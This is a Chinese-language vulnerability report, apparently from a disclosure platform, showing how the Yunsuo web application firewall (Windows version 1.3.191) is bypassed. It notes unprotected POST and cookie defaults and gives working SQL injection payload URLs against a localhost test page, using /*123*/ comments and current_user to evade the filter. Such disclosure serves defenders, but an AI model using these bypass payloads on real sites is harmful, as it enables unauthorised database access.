### 简要描述:
绕了几周终于绕过去了,真的不容易,求首页
执着是一种态度~
### 详细说明:
测试的是windows下的win_1.3.191最新版
存在两个问题:
1.默认配置对POST和cookie没防护,有防护的功能默认勾上呗
[<img src="https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg)
2.防护规则可被/*123*/这种形式绕过
### 漏洞证明:
还是配置一个注入环境:
1.先试下/**/发现被云锁拦截了:
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
[<img src="https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg)
2.使用/**/成功得到很多字段:
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
[<img src="https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg)
3.问题又来了,发现云锁对数据库查询防护很严格
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
[<img src="https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg)
4.经过几周的学习,发现current_user这个方式又可以绕过了!
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
[<img src="https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg)
执着是一种态度~
京公网安备 11010502034610号
暂无评论